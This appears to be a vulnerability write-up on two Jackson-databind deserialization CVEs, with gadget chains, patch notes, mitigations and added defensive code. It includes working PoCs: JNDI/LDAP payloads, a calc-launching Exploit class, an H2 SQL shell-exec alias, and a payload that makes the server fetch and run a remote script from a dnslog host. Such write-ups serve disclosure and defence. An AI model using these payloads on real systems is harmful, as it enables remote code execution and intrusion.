Analysis of Two Jackson-databind Vulnerabilities
Word count: 1709 | 2025-08-06 08:35:44
Jackson-databind vulnerability analysis and exploitation guide
Overview
This document analyses two high-severity Jackson-databind vulnerabilities, CVE-2020-36189 (SSRF & RCE) and CVE-2020-36186 (RCE), and gives exploitation methods and mitigation advice.
CVE-2020-36186 analysis
Affected versions
- Jackson-databind < 2.9.10.7
Exploitation conditions
- enableDefaultTyping() is enabled
- the commons-dbcp third-party dependency is on the classpath
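The first condition above is the ObjectMapper configuration that every PoC in this post relies on. The following is an added example, not code from the original post: it places that weak configuration beside the allow-list alternative (activateDefaultTyping with a BasicPolymorphicTypeValidator, available since Jackson 2.10) and feeds both a constructed payload in the same ["class", {...}] shape, naming a harmless JDK class instead of a gadget. The package prefix com.example.app. and the class name DefaultTypingCheck are assumptions.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

// Added example (not from the original post). Assumes jackson-databind 2.10 or later.
public class DefaultTypingCheck {

    // Weak: any class reachable from the classpath may be named in a
    // ["fully.qualified.Class", {...}] array. This is the precondition the PoCs need.
    static ObjectMapper weakMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping(); // deprecated since 2.10 for exactly this reason
        return m;
    }

    // Hardened: type ids are honoured only for the application's own package.
    // "com.example.app." is an assumed package prefix; substitute your own.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.app.")
                .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return m;
    }

    // true when the mapper honours the type id in the payload,
    // false when the validator rejects it.
    static boolean acceptsTypeId(ObjectMapper mapper, String json) throws Exception {
        try {
            mapper.readValue(json, Object.class);
            return true;
        } catch (InvalidTypeIdException e) {
            System.out.println("rejected type id: " + e.getTypeId());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed payload: same shape as the PoCs, but a harmless JDK class.
        String json = "[\"java.util.HashMap\", {\"k\":\"v\"}]";
        System.out.println("enableDefaultTyping():     accepted=" + acceptsTypeId(weakMapper(), json));
        System.out.println("allow-list default typing: accepted=" + acceptsTypeId(hardenedMapper(), json));
    }
}
```

The weak mapper accepts the java.util.HashMap type id; the hardened mapper throws InvalidTypeIdException because the name is not under the allowed prefix. Prefer a name-based matcher such as allowIfSubType(String): validateSubClassName runs before Jackson loads the named class, whereas a class-based matcher is only consulted after the class has been loaded. Not enabling default typing at all and binding to concrete types remains the safest option.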
Description
The class org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource bypasses the blocklist maintained by Jackson-databind; on older JDK versions this can lead to remote code execution (RCE).
Reproduction environment
pom.xml dependencies:
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.10.7</version>
</dependency>
<dependency>
<groupId>tomcat</groupId>
<artifactId>naming-factory-dbcp</artifactId>
<version>5.5.23</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-nop</artifactId>
<version>1.7.2</version>
</dependency>
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
</dependency>
</dependencies>
Exploitation steps
- Prepare the malicious class, Exploit.java:
import java.lang.Runtime;
public class Exploit {
static {
try {
Runtime.getRuntime().exec("calc");
} catch (Exception e) {
e.printStackTrace();
}
}
}
- Start an HTTP server:
python -m SimpleHTTPServer 4444
- Start an LDAP server: use the marshalsec tool to start the LDAP service.
- Run the vulnerability PoC, POC.java:
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class POC {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping(); // precondition: type ids are honoured for any class on the classpath
mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
// first array element names the gadget class, second element is its property map
String json = "[\"org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource\", {\"dataSourceName\":\"ldap://127.0.0.1:1288/Exploit\"}]";
Object obj = mapper.readValue(json, Object.class);
mapper.writeValueAsString(obj); // serialising the object invokes its getters, where the chain continues
}
}
Root cause analysis
Attack chain (gadget chain):
PerUserPoolDataSource
-> InstanceKeyDataSource.setDataSourceName
-> PerUserPoolDataSource.getPooledConnectionAndInfo
-> PerUserPoolDataSource.registerPool
-> PerUserPoolDataSource.testCPDS
-> lookup
Patch analysis
Upstream added org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource to the blocklist. Note that the similar class org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource carries the same risk.
CVE-2020-36189 analysis
Affected versions
- Jackson-databind < 2.9.10.7
Exploitation conditions
- enableDefaultTyping() is enabled
- the com.h2database or com.newrelic.agent.java third-party dependency is on the classpath
Description
The class com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource bypasses the Jackson-databind blocklist and can lead to SSRF and RCE.
Reproduction environment
pom.xml dependencies:
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.10.7</version>
</dependency>
<dependency>
<groupId>com.newrelic.agent.java</groupId>
<artifactId>newrelic-agent</artifactId>
<version>4.9.0</version>
</dependency>
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<version>1.4.199</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-nop</artifactId>
<version>1.7.2</version>
</dependency>
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
</dependency>
</dependencies>
Exploitation steps
- Prepare the SQL script, exec.sql:
CREATE ALIAS SHELLEXEC AS
$$
String shellexec(String cmd) throws java.io.IOException {
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$
;
CALL SHELLEXEC('calc.exe')
- Start an HTTP server:
python2 -m SimpleHTTPServer 4444
- SSRF PoC:
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class POC {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
String json = "[\"com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://6vrdsp.dnslog.cn/exec.sql'\"}]";
Object obj = mapper.readValue(json, Object.class);
mapper.writeValueAsString(obj);
}
}
- RCE PoC:
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class POC {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
String json = "[\"com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:4444/exec.sql'\"}]";
Object obj = mapper.readValue(json, Object.class);
mapper.writeValueAsString(obj);
}
}
Root cause analysis
Attack chain (gadget chain):
DriverManagerConnectionSource
-> setUrl
-> getConnection
-> DriverManager.getConnection(this.url)
Patch analysis
Upstream added com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource to the blocklist.
Newly disclosed gadgets
Gadget 1
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class POC2 {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
String json = "[\"shaded.com.github.susom.database.shaded.com.zaxxer.hikari.HikariDataSource\", {\"metricRegistry\": \"ldap://127.0.0.1:1288/Exploit\"}]";
mapper.readValue(json, Object.class);
}
}
Gadget 2
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class POC2 {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
String json = "[\"shaded.com.github.susom.database.shaded.com.zaxxer.hikari.HikariConfig\", {\"metricRegistry\": \"ldap://127.0.0.1:1288/Exploit\"}]";
mapper.readValue(json, Object.class);
}
}
Upstream policy change
Since the release of 2.9.10.8 on 2020-12-31, Jackson-databind:
- no longer maintains the blocklist (except for extremely serious issues)
- no longer requests CVE identifiers for such issues
- continues to accept security reports
Mitigation
- Upgrade Jackson-databind to a fixed version (>= 2.9.10.7)
- Upgrade the JDK to a recent release (>= 11.0.1, 8u191, 7u201, 6u211)
- Avoid the enableDefaultTyping() method
- Review dependencies for dangerous components (such as commons-dbcp and h2database)
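The last two recommendations are things an application can check for itself at start-up. The following is an added example, not code from the original post: it reports which of the gadget classes named in this post are reachable from the application's class loader, loading each without running its static initializer, and compares the jackson-databind version found on the classpath against the threshold the post gives. It uses only the JDK (Java 8 or later); the class name GadgetClasspathAudit is an assumption, and the version threshold is the one stated above.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

// Added example (not from the original post): start-up self-check for the
// gadget classes and the databind version discussed in this post.
public class GadgetClasspathAudit {

    // Class names discussed in this post (blocklisted or reported as gadgets).
    static final List<String> WATCHED_CLASSES = Arrays.asList(
            "org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource",
            "org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource",
            "com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource",
            "shaded.com.github.susom.database.shaded.com.zaxxer.hikari.HikariDataSource",
            "shaded.com.github.susom.database.shaded.com.zaxxer.hikari.HikariConfig");

    // Threshold as stated in this post (">= 2.9.10.7"); adjust to your advisory source.
    static final String MIN_FIXED_VERSION = "2.9.10.7";

    // initialize=false: ask only whether the class is reachable; never run the
    // static initializer of code we are auditing for.
    static boolean isReachable(String className, ClassLoader loader) {
        try {
            Class.forName(className, false, loader);
            return true;
        } catch (ClassNotFoundException | LinkageError e) {
            return false;
        }
    }

    static List<String> reachableGadgets(ClassLoader loader) {
        List<String> found = new ArrayList<>();
        for (String name : WATCHED_CLASSES) {
            if (isReachable(name, loader)) {
                found.add(name);
            }
        }
        return found;
    }

    // jackson-databind exposes its version as PackageVersion.VERSION; read it
    // reflectively so this class also compiles where databind is absent.
    static String databindVersion(ClassLoader loader) {
        try {
            Class<?> pv = Class.forName("com.fasterxml.jackson.databind.cfg.PackageVersion", true, loader);
            return pv.getField("VERSION").get(null).toString();
        } catch (ReflectiveOperationException e) {
            return null;
        }
    }

    // Segment-wise numeric comparison. Jackson's Version.toString() may render the
    // fourth component of 2.9.10.7 as "2.9.10-7", so '.' and '-' both split segments.
    static int compareVersions(String a, String b) {
        String[] pa = a.split("[.\\-]"), pb = b.split("[.\\-]");
        int n = Math.max(pa.length, pb.length);
        for (int i = 0; i < n; i++) {
            int x = i < pa.length ? segment(pa[i]) : 0;
            int y = i < pb.length ? segment(pb[i]) : 0;
            if (x != y) {
                return Integer.compare(x, y);
            }
        }
        return 0;
    }

    private static int segment(String s) {
        try {
            return Integer.parseInt(s);
        } catch (NumberFormatException e) {
            return 0; // non-numeric qualifiers (e.g. "SNAPSHOT") do not affect ordering here
        }
    }

    public static void main(String[] args) {
        ClassLoader loader = GadgetClasspathAudit.class.getClassLoader();
        String version = databindVersion(loader);
        if (version == null) {
            System.out.println("jackson-databind not on classpath");
        } else {
            boolean old = compareVersions(version, MIN_FIXED_VERSION) < 0;
            System.out.println("jackson-databind " + version
                    + (old ? " (older than " + MIN_FIXED_VERSION + ")" : ""));
        }
        List<String> gadgets = reachableGadgets(loader);
        System.out.println(gadgets.isEmpty() ? "no watched gadget classes reachable"
                : "reachable gadget classes: " + gadgets);
    }
}
```

A reachable gadget class only matters when default typing is enabled, so treat the report as a prompt to remove the dependency or the enableDefaultTyping() call, not as proof of exploitability. Shaded copies live under different package names, as Gadget 1 and Gadget 2 above show, so the watch list has to carry the shaded names too.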
References
- https://github.com/FasterXML/jackson-databind/issues/2997
- https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1
- https://github.com/FasterXML/jackson-databind/issues/2996
- https://github.com/FasterXML/jackson-databind/commit/33d96c13fe18a2dad01b19ce195548c9acea9da4